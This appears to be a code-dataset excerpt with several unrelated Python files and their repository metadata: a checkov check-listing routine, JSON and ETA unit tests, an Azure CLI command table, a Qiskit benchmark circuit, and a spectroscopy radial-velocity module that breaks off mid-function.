printable_checks_list.append((check.get_output_id(use_bc_ids), checked_type, entity, check.name, iac))
elif isinstance(registry, BaseGraphRegistry):
for check in registry.checks:
for rt in check.resource_types:
printable_checks_list.append((check.get_output_id(use_bc_ids), checked_type, rt, check.name, iac))
if any(x in framework_list for x in ("all", "terraform")):
add_from_repository(resource_registry, "resource", "Terraform")
add_from_repository(data_registry, "data", "Terraform")
add_from_repository(provider_registry, "provider", "Terraform")
add_from_repository(module_registry, "module", "Terraform")
graph_registry = get_graph_checks_registry("terraform")
graph_registry.load_checks()
add_from_repository(graph_registry, "resource", "Terraform")
if any(x in framework_list for x in ("all", "cloudformation")):
add_from_repository(cfn_registry, "resource", "Cloudformation")
if any(x in framework_list for x in ("all", "kubernetes")):
add_from_repository(k8_registry, "resource", "Kubernetes")
if any(x in framework_list for x in ("all", "serverless")):
add_from_repository(sls_registry, "resource", "serverless")
if any(x in framework_list for x in ("all", "dockerfile")):
add_from_repository(dockerfile_registry, "dockerfile", "dockerfile")
if any(x in framework_list for x in ("all", "github_configuration")):
add_from_repository(github_configuration_registry, "github_configuration", "github_configuration")
if any(x in framework_list for x in ("all", "github_actions")):
add_from_repository(github_actions_jobs_registry, "jobs", "github_actions")
if any(x in framework_list for x in ("all", "gitlab_configuration")):
add_from_repository(gitlab_configuration_registry, "gitlab_configuration", "gitlab_configuration")
if any(x in framework_list for x in ("all", "bitbucket_configuration")):
add_from_repository(bitbucket_configuration_registry, "bitbucket_configuration", "bitbucket_configuration")
if any(x in framework_list for x in ("all", "arm")):
add_from_repository(arm_resource_registry, "resource", "arm")
add_from_repository(arm_parameter_registry, "parameter", "arm")
if any(x in framework_list for x in ("all", "bicep")):
add_from_repository(bicep_param_registry, "parameter", "Bicep")
add_from_repository(bicep_resource_registry, "resource", "Bicep")
if any(x in framework_list for x in ("all", "secrets")):
for check_id, check_type in CHECK_ID_TO_SECRET_TYPE.items():
printable_checks_list.append((check_id, check_type, "secrets", check_type, "secrets"))
return sorted(printable_checks_list, key=get_compare_key)
if __name__ == '__main__':
print_checks()
| 55.317308
| 120
| 0.746046
|
f8b0b35c09c785b08cc76fff5d91f8b138396f08
| 982
|
py
|
Python
|
tests/test_json.py
|
JoshKarpel/iax
|
3f28ba2f94eb373b02ea080955f33681c951578c
|
[
"MIT"
] | null | null | null |
tests/test_json.py
|
JoshKarpel/iax
|
3f28ba2f94eb373b02ea080955f33681c951578c
|
[
"MIT"
] | null | null | null |
tests/test_json.py
|
JoshKarpel/iax
|
3f28ba2f94eb373b02ea080955f33681c951578c
|
[
"MIT"
] | null | null | null |
import datetime
import random
import pytest
from ix import ix
def test_to_jsons():
@ix
class JSON:
a: int
b: float
d: str
e: bool
jsons = [
JSON(0, 1.8, 'hi', True),
JSON(2, 5.3, 'lo', False),
JSON(-10, -4.2, 'foo', True),
]
expected = '[{"a": 0, "b": 1.8, "d": "hi", "e": true}, {"a": 2, "b": 5.3, "d": "lo", "e": false}, {"a": -10, "b": -4.2, "d": "foo", "e": true}]'
assert JSON.to_jsons(jsons) == expected
def test_nested_to_jsons():
@ix
class Inner:
a: int
@ix
class Outer:
inner: Inner
obj = [Outer(Inner(5))]
expected = '[{"inner": {"a": 5}}]'
assert Outer.to_jsons(obj) == expected
def test_load_nested_jsons():
@ix
class Inner:
a: int
@ix
class Outer:
inner: Inner
obj = [Outer(Inner(5))]
jsons = Outer.to_jsons(obj)
loaded = list(Outer.from_jsons(jsons))
assert loaded[0] == obj[0]
| 16.931034
| 148
| 0.5
|
b3ddffb8f2869b82f5a9c1b1b8c9bb343758e5f4
| 857
|
py
|
Python
|
src/command_modules/azure-cli-configure/azure/cli/command_modules/configure/commands.py
|
kristapratico/azure-cli
|
00d4ce5caed40758d4a13c428a28583d10c155cf
|
[
"MIT"
] | null | null | null |
src/command_modules/azure-cli-configure/azure/cli/command_modules/configure/commands.py
|
kristapratico/azure-cli
|
00d4ce5caed40758d4a13c428a28583d10c155cf
|
[
"MIT"
] | null | null | null |
src/command_modules/azure-cli-configure/azure/cli/command_modules/configure/commands.py
|
kristapratico/azure-cli
|
00d4ce5caed40758d4a13c428a28583d10c155cf
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.commands import CliCommandType
def load_command_table(self, _):
configure_custom = CliCommandType(operations_tmpl='azure.cli.command_modules.configure.custom#{}')
with self.command_group('', configure_custom) as g:
g.command('configure', 'handle_configure')
with self.command_group('cache', configure_custom) as g:
g.command('list', 'list_cache_contents')
g.command('show', 'show_cache_contents')
g.command('delete', 'delete_cache_contents')
| 42.85
| 102
| 0.572929
|
71fa1053686b34be41af7c3ac5cc774b88081e14
| 4,036
|
py
|
Python
|
benchmark/startQiskit_noisy1011.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startQiskit_noisy1011.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startQiskit_noisy1011.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=5
# total number=41
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[4]) # number=21
prog.cx(input_qubit[3],input_qubit[0]) # number=32
prog.z(input_qubit[3]) # number=33
prog.cx(input_qubit[3],input_qubit[0]) # number=34
prog.rx(0.11938052083641225,input_qubit[1]) # number=36
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.rx(1.4765485471872026,input_qubit[2]) # number=35
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.cx(input_qubit[1],input_qubit[0]) # number=38
prog.x(input_qubit[0]) # number=39
prog.cx(input_qubit[1],input_qubit[0]) # number=40
prog.x(input_qubit[4]) # number=30
prog.x(input_qubit[1]) # number=10
prog.x(input_qubit[2]) # number=11
prog.rx(-2.5258404934861938,input_qubit[1]) # number=25
prog.h(input_qubit[3]) # number=29
prog.cx(input_qubit[0],input_qubit[3]) # number=22
prog.x(input_qubit[3]) # number=23
prog.cx(input_qubit[0],input_qubit[3]) # number=24
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.rx(-0.0722566310325653,input_qubit[4]) # number=37
prog.x(input_qubit[1]) # number=14
prog.cx(input_qubit[0],input_qubit[2]) # number=26
prog.x(input_qubit[2]) # number=27
prog.cx(input_qubit[0],input_qubit[2]) # number=28
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = FakeVigo()
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_noisy1011.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 31.53125
| 82
| 0.61893
|
e5b009d0d07e01f4929836786ce1cb730508c633
| 3,506
|
py
|
Python
|
tests/test_eta_3_simple.py
|
Robpol86/etaprogress
|
224e8a248c2bf820bad218763281914ad3983fff
|
[
"MIT"
] | 13
|
2015-08-25T05:54:21.000Z
|
2021-03-23T15:56:58.000Z
|
tests/test_eta_3_simple.py
|
Robpol86/etaprogress
|
224e8a248c2bf820bad218763281914ad3983fff
|
[
"MIT"
] | 5
|
2015-03-14T16:31:38.000Z
|
2019-01-13T20:46:25.000Z
|
tests/test_eta_3_simple.py
|
Robpol86/etaprogress
|
224e8a248c2bf820bad218763281914ad3983fff
|
[
"MIT"
] | 5
|
2015-05-31T14:16:50.000Z
|
2021-02-06T11:23:43.000Z
|
from etaprogress import eta
def test_one():
eta_instance = eta.ETA(1)
eta._NOW = lambda: 1411868722.680839
eta_instance.set_numerator(1)
assert 1 == eta_instance.denominator
assert eta_instance.eta_epoch is None
assert 0.0 == eta_instance.rate
assert 1 == eta_instance.numerator
assert eta_instance.stalled is True
assert eta_instance.started is False
assert eta_instance.undefined is False
assert eta_instance.done is True
assert eta_instance.eta_seconds is None
assert 100.0 == eta_instance.percent
assert 0.0 == eta_instance.elapsed
def test_two():
eta_instance = eta.ETA(2)
eta._NOW = lambda: 1411868721.680839
eta_instance.set_numerator(1)
assert 2 == eta_instance.denominator
assert eta_instance.eta_epoch is None
assert 0.0 == eta_instance.rate
assert 1 == eta_instance.numerator
assert eta_instance.stalled is True
assert eta_instance.started is False
assert eta_instance.undefined is False
assert eta_instance.done is False
assert eta_instance.eta_seconds is None
assert 50.0 == eta_instance.percent
assert 0.0 == eta_instance.elapsed
eta._NOW = lambda: 1411868722.680839
eta_instance.set_numerator(2)
assert 2 == eta_instance.denominator
assert 2 == eta_instance.numerator
assert eta_instance.started is True
assert eta_instance.undefined is False
assert eta_instance.done is True
assert 100.0 == eta_instance.percent
def test_five():
eta._NOW = lambda: 1411868720.680839
eta_instance = eta.ETA(5)
eta._NOW = lambda: 1411868721.680839
eta_instance.set_numerator(1)
assert 5 == eta_instance.denominator
assert eta_instance.eta_epoch is None
assert 0.0 == eta_instance.rate
assert 1 == eta_instance.numerator
assert eta_instance.stalled is True
assert eta_instance.started is False
assert eta_instance.undefined is False
assert eta_instance.done is False
assert eta_instance.eta_seconds is None
assert 20.0 == eta_instance.percent
assert 0.0 == eta_instance.elapsed
eta._NOW = lambda: 1411868722.680839
eta_instance.set_numerator(2)
assert 5 == eta_instance.denominator
assert 1411868725.680839 == eta_instance.eta_epoch
assert 1.0 == eta_instance.rate
assert 2 == eta_instance.numerator
assert eta_instance.stalled is False
assert eta_instance.started is True
assert eta_instance.undefined is False
assert eta_instance.done is False
assert 3.0 == eta_instance.eta_seconds
assert 40.0 == eta_instance.percent
assert 2.0 == eta_instance.elapsed
eta._NOW = lambda: 1411868723.680839
eta_instance.set_numerator(3)
assert 5 == eta_instance.denominator
assert 1411868725.680839 == eta_instance.eta_epoch
assert 1.0 == eta_instance.rate
assert 3 == eta_instance.numerator
assert eta_instance.stalled is False
assert eta_instance.started is True
assert eta_instance.undefined is False
assert eta_instance.done is False
assert 2.0 == eta_instance.eta_seconds
assert 60.0 == eta_instance.percent
assert 3.0 == eta_instance.elapsed
eta._NOW = lambda: 1411868725.680839
eta_instance.set_numerator(5)
assert 5 == eta_instance.denominator
assert 5 == eta_instance.numerator
assert eta_instance.started is True
assert eta_instance.undefined is False
assert eta_instance.done is True
assert 100.0 == eta_instance.percent
assert 5.0 == eta_instance.elapsed
| 33.711538
| 54
| 0.736737
|
e14320e18a07497f6d86105edc01d72f6fb68b18
| 145,198
|
py
|
Python
|
doppler/rv.py
|
dnidever/radvel
|
7e97ee6537b69bfd4bde7e30d8b3639b00507163
|
[
"MIT"
] | null | null | null |
doppler/rv.py
|
dnidever/radvel
|
7e97ee6537b69bfd4bde7e30d8b3639b00507163
|
[
"MIT"
] | null | null | null |
doppler/rv.py
|
dnidever/radvel
|
7e97ee6537b69bfd4bde7e30d8b3639b00507163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""RV.PY - Generic Radial Velocity Software
"""
from __future__ import print_function
__authors__ = 'David Nidever <dnidever@montana.edu>'
__version__ = '20210605' # yyyymmdd
import os
#import sys, traceback
import contextlib, io, sys
import numpy as np
import warnings
from astropy.io import fits
from astropy.table import Table
import astropy.units as u
from astropy.time import Time
from astropy.coordinates import SkyCoord, EarthLocation
from astropy.wcs import WCS
from scipy.ndimage.filters import median_filter,gaussian_filter1d
from dlnpyutils.minpack import curve_fit
from scipy.optimize import least_squares
from scipy.interpolate import interp1d
import thecannon as tc
from dlnpyutils import utils as dln, bindata
from .spec1d import Spec1D
from . import (cannon,payne,utils,reader)
import copy
import emcee
import corner
import logging
import time
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.legend import Legend
import subprocess
try:
import __builtin__ as builtins # Python 2
except ImportError:
import builtins # Python 3
# Ignore these warnings, it's a bug
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
warnings.filterwarnings("ignore", message="numpy.ufunc size changed")
cspeed = 2.99792458e5 # speed of light in km/s
def xcorr_dtype(nlag):
"""Return the dtype for the xcorr structure"""
dtype = np.dtype([("xshift0",float),("ccp0",float),("xshift",float),("xshifterr",float),
("xshift_interp",float),("ccf",(float,nlag)),("ccferr",(float,nlag)),("ccnlag",int),
("cclag",(int,nlag)),("ccpeak",float),("ccpfwhm",float),("ccp_pars",(float,4)),
("ccp_perror",(float,4)),("ccp_polycoef",(float,4)),("vrel",float),
("vrelerr",float),("w0",float),("dw",float),("chisq",float)])
return dtype
# astropy.modeling can handle errors and constraints
# https://stackoverflow.com/questions/2828953/silence-the-stdout-of-a-function-in-python-without-trashing-sys-stdout-and-resto
# usage:
# with mute():
# foo()
@contextlib.contextmanager
def mute():
'''Prevent print to stdout, but if there was an error then catch it and
print the output before raising the error.'''
saved_stdout = sys.stdout
saved_stderr = sys.stderr
sys.stdout = io.StringIO()
sys.stderr = io.StringIO()
try:
yield
except Exception:
saved_output = sys.stdout
saved_outerr = sys.stderr
sys.stdout = saved_stdout
sys.stderr = saved_stderr
print(saved_output.getvalue())
print(saved_outerr.getvalue())
raise
sys.stdout = saved_stdout
sys.stderr = saved_stderr
def tweakcontinuum(spec,model,smlen=None,usepoly=False,polyorder=3):
""" Tweak the continuum normalization of an observed spectrum using a good-fit model."""
if smlen is None:
smlen = spec.npix/10.0
if hasattr(spec,'cont') is False:
spec.cont = spec.flux.copy()*0+1
# Loop over orders
for i in range(spec.norder):
if spec.norder==1:
ratio = spec.flux/model.flux
mask = spec.mask
gd,ngd,bd,nbd = dln.where((mask==False) & (spec.flux>0) & np.isfinite(spec.flux),comp=True)
else:
ratio = spec.flux[:,i]/model.flux[:,i]
mask = spec.mask[:,i]
gd,ngd,bd,nbd = dln.where((mask==False) & (spec.flux[:,i]>0) & np.isfinite(spec.flux[:,i]),comp=True)
# Set bad pixels to NaN, gsmooth masks those out
if nbd>0:
ratio[bd] = np.nan
ratio[0] = np.nanmedian(ratio[0:np.int(smlen/2)])
ratio[-1] = np.nanmedian(ratio[-np.int(smlen/2):-1])
# Use Gaussian Smoothing
if usepoly is False:
sm = dln.gsmooth(ratio,smlen,boundary='extend')
# Use low-order,polynomial
else:
x = np.linspace(-1,1,spec.npix)
coef = dln.poly_fit(x[gd],ratio[gd]-1,polyorder)
sm = dln.poly(x,coef)+1
# Deal with any remaining NaNs
bd, = np.where(np.isfinite(sm)==False)
if len(bd)>0:
sm[bd] = 1.0
if spec.norder==1:
spec.cont *= sm
spec.flux /= sm
spec.err /= sm
else:
spec.cont[:,i] *= sm
spec.flux[:,i] /= sm
spec.err[:,i] /= sm
return spec
def specfigure(figfile,spec,fmodel,out,annotlabels=None,original=None,verbose=True,figsize=10,ispayne=False):
"""
Make diagnostic figure.
Parameters
----------
figfile : str
Output figure filename.
spec : Spec1D object
The observed spectrum used for the fitting (normalized, masked and tweaked).
fmodel : Spec1D object
The best-fitting model (Cannon or Payne) spectrum.
out : numpy structured array
Catalog of best-fitting values to use for the annotation.
annotlabels : list, optional
The list of labels to use for the annotation. Default is ['teff','logg','feh','vrel'].
original : Spec1D object, optional
The original but normalized spectrum. Not tweaked or masked.
verbose : boolean, optional
Verbose output. Default is True.
figsize : float, optional
Figure size to use. Default is 10 inches.
ispayne: boolean, optional
Is this a Payne model. Default is False.
Returns
-------
Figure is saved to figfile.
Example
-------
.. code-block:: python
specfigure(figfile,specm,fmodel,out,original=orig,verbose=True,ispayne=True,annotlabels=annotlabels)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
if annotlabels is None:
annotlabels = ['teff','logg','feh','vrel']
#import matplotlib
matplotlib.use('Agg')
#import matplotlib.pyplot as plt
if os.path.exists(figfile): os.remove(figfile)
norder = spec.norder
nlegcol = 2
if original is not None: nlegcol=3
# Single-order plot
if norder==1:
fig,ax = plt.subplots()
fig.set_figheight(figsize*0.5)
fig.set_figwidth(figsize)
if original is not None:
plt.plot(original.wave,original.flux,color='green',label='Original',linewidth=1)
plt.plot(spec.wave,spec.flux,'b',label='Masked Data',linewidth=1)
plt.plot(fmodel.wave,fmodel.flux,'r',label='Model',linewidth=1,alpha=0.8)
leg = ax.legend(loc='upper left', frameon=True, framealpha=0.8, ncol=nlegcol)
plt.xlabel('Wavelength (Angstroms)')
plt.ylabel('Normalized Flux')
xr = dln.minmax(spec.wave)
yr = [np.min([spec.flux,fmodel.flux]), np.max([spec.flux,fmodel.flux])]
if original is not None:
yr = [np.min([original.flux,spec.flux,fmodel.flux]), np.max([spec.flux,fmodel.flux])]
yr = [yr[0]-dln.valrange(yr)*0.15,yr[1]+dln.valrange(yr)*0.005]
yr = [np.max([yr[0],-0.2]), np.min([yr[1],2.0])]
plt.xlim(xr)
plt.ylim(yr)
snr = np.nanmedian(spec.flux/spec.err)
plt.title(spec.filename)
if ispayne is False:
ax.annotate(r'S/N=%5.1f Teff=%5.1f$\pm$%5.1f logg=%5.2f$\pm$%5.2f [Fe/H]=%5.2f$\pm$%5.2f Vrel=%5.2f$\pm$%5.2f chisq=%5.2f' %
(snr, out['teff'], out['tefferr'], out['logg'], out['loggerr'], out['feh'], out['feherr'], out['vrel'], out['vrelerr'], out['chisq']),
xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center')
else:
fmt = r'S/N=%5.1f '
annotarr = [snr]
for k,name in enumerate(annotlabels):
fmt += r''+name+'=%5.1f$\pm$%5.1f '
annotarr += [dln.first_el(out[name]),dln.first_el(out[name+'err'])]
fmt += r' chisq=%5.2f'
annotarr += [dln.first_el(out['chisq'])]
ax.annotate(fmt % tuple(annotarr), xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center')
# Multi-order plot
else:
fig,ax = plt.subplots(norder)
fig.set_figheight(figsize)
fig.set_figwidth(figsize)
for i in range(norder):
if original is not None:
ax[i].plot(original.wave[:,i],original.flux[:,i],color='green',label='Original',linewidth=1)
ax[i].plot(spec.wave[:,i],spec.flux[:,i],'b',label='Masked Data',linewidth=1)
ax[i].plot(fmodel.wave[:,i],fmodel.flux[:,i],'r',label='Model',linewidth=1,alpha=0.8)
if i==0:
leg = ax[i].legend(loc='upper left', frameon=True, framealpha=0.8, ncol=nlegcol)
ax[i].set_xlabel('Wavelength (Angstroms)')
ax[i].set_ylabel('Normalized Flux')
xr = dln.minmax(spec.wave[:,i])
yr = [np.min([spec.flux[:,i],fmodel.flux[:,i]]), np.max([spec.flux[:,i],fmodel.flux[:,i]])]
if original is not None:
yr = [np.min([original.flux[:,i],spec.flux[:,i],fmodel.flux[:,i]]), np.max([spec.flux[:,i],fmodel.flux[:,i]])]
yr = [yr[0]-dln.valrange(yr)*0.05,yr[1]+dln.valrange(yr)*0.05]
if i==0:
yr = [yr[0]-dln.valrange(yr)*0.15,yr[1]+dln.valrange(yr)*0.05]
yr = [np.max([yr[0],-0.2]), np.min([yr[1],2.0])]
ax[i].set_xlim(xr)
ax[i].set_ylim(yr)
# legend
if i==0:
snr = np.nanmedian(spec.flux/spec.err)
ax[i].set_title(spec.filename)
if ispayne is False:
ax[i].annotate(r'S/N=%5.1f Teff=%5.1f$\pm$%5.1f logg=%5.2f$\pm$%5.2f [Fe/H]=%5.2f$\pm$%5.2f Vrel=%5.2f$\pm$%5.2f chisq=%5.2f' %
(snr,out['teff'],out['tefferr'],out['logg'],out['loggerr'],out['feh'],out['feherr'],out['vrel'],out['vrelerr'],out['chisq']),
xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center')
else:
fmt = r'S/N=%5.1f '
annotarr = [snr]
for k,name in enumerate(annotlabels):
fmt += r''+name+'=%5.1f$\pm$%5.1f '
annotarr += [dln.first_el(out[name]),dln.first_el(out[name+'err'])]
fmt += r' chisq=%5.2f'
annotarr += [dln.first_el(out['chisq'])]
ax[i].annotate(fmt % tuple(annotarr), xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center')
plt.savefig(figfile,bbox_inches='tight')
plt.close(fig)
if verbose is True: print('Figure saved to '+figfile)
def ccorrelate(x, y, lag, yerr=None, covariance=False, double=None, nomean=False):
"""This function computes the cross correlation of two samples.
This function computes the cross correlation Pxy(L) or cross
covariance Rxy(L) of two sample populations X and Y as a function
of the lag (L).
This was translated from APC_CORRELATE.PRO which was itself a
modification to the IDL C_CORRELATE.PRO function.
Parameters
----------
x : array
The first array to cross correlate (e.g., the template). If y is 2D
(e.g., [Npix,Norder]), then x can be either 2D or 1D. If x is 1D, then
the cross-correlation is performed between x and each order of y and
a 2D array will be output. If x is 2D, then the cross-correlation
of each order of x and y is performed and the results combined.
y : array
The second array to cross correlate. Must be the same lenght as x.
Can be 2D (e.g., [Npix, Norder]), but the shifting is always done
on the 1st dimension.
lag : array
Vector that specifies the absolute distance(s) between
indexed elements of x in the interval [-(n-2), (n-2)].
yerr : array, optional
Array of uncertainties in y. Must be the same shape as y.
covariange : bool
If true, then the sample cross covariance is computed.
Returns
-------
cross : array
The cross correlation or cross covariance.
cerror : array
The uncertainty in "cross". Only if "yerr" is input.
Example
-------
Define two n-element sample populations.
.. code-block:: python
x = [3.73, 3.67, 3.77, 3.83, 4.67, 5.87, 6.70, 6.97, 6.40, 5.57]
y = [2.31, 2.76, 3.02, 3.13, 3.72, 3.88, 3.97, 4.39, 4.34, 3.95]
Compute the cross correlation of X and Y for LAG = -5, 0, 1, 5, 6, 7
.. code-block:: python
lag = [-5, 0, 1, 5, 6, 7]
result = ccorrelate(x, y, lag)
The result should be:
.. code-block:: python
[-0.428246, 0.914755, 0.674547, -0.405140, -0.403100, -0.339685]
"""
# Compute the sample cross correlation or cross covariance of
# (Xt, Xt+l) and (Yt, Yt+l) as a function of the lag (l).
xshape = x.shape
yshape = y.shape
nx = xshape[0]
if x.ndim==1:
nxorder = 1
else:
nxorder = xshape[1]
ny = yshape[0]
if y.ndim==1:
nyorder = 1
else:
nyorder = yshape[1]
npix = nx
norder = np.maximum(nxorder,nyorder)
# Check the inputs
if (nx != len(y)):
raise ValueError("X and Y arrays must have the same number of pixels in 1st dimension.")
if (x.ndim>2) | (y.ndim>2):
raise ValueError("X and Y must be 1D or 2D.")
if (x.ndim==2) & (y.ndim==1):
raise ValueError("If X is 2D then Y must be as well.")
# If X and Y are 2D then their Norders must be the same
if (x.ndim==2) & (y.ndim==2) & (nxorder!=nyorder):
raise ValueError("If X and Y are 2D then their length in the 2nd dimension must be the same.")
# Check that Y and Yerr have the same length
if yerr is not None:
if (y.shape != yerr.shape):
raise ValueError("Y and Yerr must have the same shape.")
if (nx<2):
raise ValueError("X and Y arrays must contain 2 or more elements.")
# Reshape arrays to [Npix,Norder], even if both are 1D
xd = x.copy()
yd = y.copy()
if yerr is not None: yderr=yerr.copy()
if (norder>1):
if (x.ndim==1):
# make multiple copies of X
xd = yd.copy()*0.0
for i in range(norder):
xd[:,i] = x.copy()
else:
xd = xd.reshape(npix,1)
yd = yd.reshape(npix,1)
if yerr is not None:
yderr = yderr.reshape(npix,1)
# Remove the means
if nomean is False:
for i in range(norder):
xd[:,i] -= np.nanmean(xd[:,i])
yd[:,i] -= np.nanmean(yd[:,i])
# Set NaNs or Infs to 0.0, mask bad pixels
fx = np.isfinite(xd)
ngdx = np.sum(fx)
nbdx = np.sum((fx==False))
if nbdx>0: xd[(fx==False)]=0.0
fy = np.isfinite(yd)
if yerr is not None:
fy &= (yderr<1e20) # mask out high errors as well
ngdy = np.sum(fy)
nbdy = np.sum((fy==False))
if nbdy>0:
yd[(fy==False)]=0.0
if yerr is not None: yderr[(fy==False)]=0.0
nlag = len(lag)
# MULTI-ORDER with ONE template and ONE spectrum to cross-correlate
###################################################################
# This is 2.3x faster than the original method down below
# for (4936, 3) spectra and nlag=765
if (norder>1) & (nxorder == nyorder):
# Initialize the output arrays
cross = np.zeros(nlag,dtype=float)
cross_error = np.zeros(nlag,dtype=float)
num = np.zeros(nlag,dtype=int) # number of "good" points at this lag
# flatten multi-order to 1D with buffer
buff = np.max(np.abs(lag))
xd1 = np.zeros(nx*norder + (norder-1)*buff,float)
yd1 = np.zeros(nx*norder + (norder-1)*buff,float)
yderr1 = np.zeros(nx*norder + (norder-1)*buff,float)
fx1 = np.zeros(nx*norder + (norder-1)*buff,bool)
fy1 = np.zeros(nx*norder + (norder-1)*buff,bool)
for i in range(norder):
lo = i*(nx+buff)
hi = lo+nx
xd1[lo:hi] = xd[:,i]
yd1[lo:hi] = yd[:,i]
yderr1[lo:hi] = yderr[:,i]
fx1[lo:hi] = fx[:,i]
fy1[lo:hi] = fy[:,i]
nx1 = len(xd1)
# Loop over lag points
for k in range(nlag):
# Note the reversal of the variables for negative lags.
if lag[k]>0:
cross[k] = np.sum(xd1[0:nx1-lag[k]] * yd1[lag[k]:])
num[k] = np.sum(fx1[0:nx1-lag[k]] * fy1[lag[k]:])
if yerr is not None:
cross_error[k] = np.sum( (xd1[0:nx1-lag[k]] * yderr1[lag[k]:])**2 )
else:
cross[k] = np.sum(yd1[0:nx1+lag[k]] * xd1[-lag[k]:])
num[k] = np.sum(fy1[0:nx1+lag[k]] * fx1[-lag[k]:])
if yerr is not None:
cross_error[k] = np.sum( (yderr1[0:nx1+lag[k]] * xd1[-lag[k]:])**2 )
rmsx = np.sqrt(np.sum((xd*fx)**2))
if rmsx==0.0: rmsx=1.0
rmsy = np.sqrt(np.sum((yd*fy)**2))
if rmsy==0.0: rmsy=1.0
# Normalize by number of "good" points
cross *= np.max(num)
pnum = (num>0)
cross[pnum] /= num[pnum] # normalize by number of "good" points
# Take sqrt to finish adding errors in quadrature
cross_error = np.sqrt(cross_error)
# normalize
cross_error *= np.max(num)
cross_error[pnum] /= num[pnum]
# Divide by N for covariance, or divide by variance for correlation.
nelements = npix*norder
if covariance is True:
cross /= nelements
cross_error /= nelements
else:
cross /= rmsx*rmsy
cross_error /= rmsx*rmsy
# SIGLE-ORDER OR ONE template with MULTIPLE spectrum to cross-correlate
#######################################################################
else:
# Initialize the output arrays
cross = np.zeros((nlag,norder),dtype=float)
cross_error = np.zeros((nlag,norder),dtype=float)
num = np.zeros((nlag,norder),dtype=int) # number of "good" points at this lag
rmsx = np.zeros(norder,dtype=float)
rmsy = np.zeros(norder,dtype=float)
# Loop over orders
for i in range(norder):
# Loop over lag points
for k in range(nlag):
# Note the reversal of the variables for negative lags.
if lag[k]>0:
cross[k,i] = np.sum(xd[0:nx-lag[k],i] * yd[lag[k]:,i])
num[k,i] = np.sum(fx[0:nx-lag[k],i] * fy[lag[k]:,i])
if yerr is not None:
cross_error[k,i] = np.sum( (xd[0:nx-lag[k],i] * yderr[lag[k]:,i])**2 )
else:
cross[k,i] = np.sum(yd[0:nx+lag[k],i] * xd[-lag[k]:,i])
num[k,i] = np.sum(fy[0:nx+lag[k],i] * fx[-lag[k]:,i])
if yerr is not None:
cross_error[k,i] = np.sum( (yderr[0:nx+lag[k],i] * xd[-lag[k]:,i])**2 )
if (npix>2):
rmsx[i] = np.sum(xd[fx[:,i],i]**2)
if (rmsx[i]==0): rmsx[i]=1.0
rmsy[i] = np.sum(yd[fy[:,i],i]**2)
if (rmsy[i]==0): rmsy[i]=1.0
else:
rmsx[i] = 1.0
rmsy[i] = 1.0
# Both X and Y are 2D, sum data from multiple orders
if (nxorder>1) & (nyorder>1):
cross = np.sum(cross,axis=1).reshape(nlag,1)
cross_error= np.sum(cross_error,axis=1).reshape(nlag,1)
num = np.sum(num,axis=1).reshape(nlag,1)
rmsx = np.sqrt(np.sum(rmsx,axis=0)).reshape(1)
rmsy = np.sqrt(np.sum(rmsy,axis=0)).reshape(1)
norder = 1
nelements = npix*norder
else:
rmsx = np.sqrt(rmsx)
rmsy = np.sqrt(rmsy)
nelements = npix
# Normalizations
for i in range(norder):
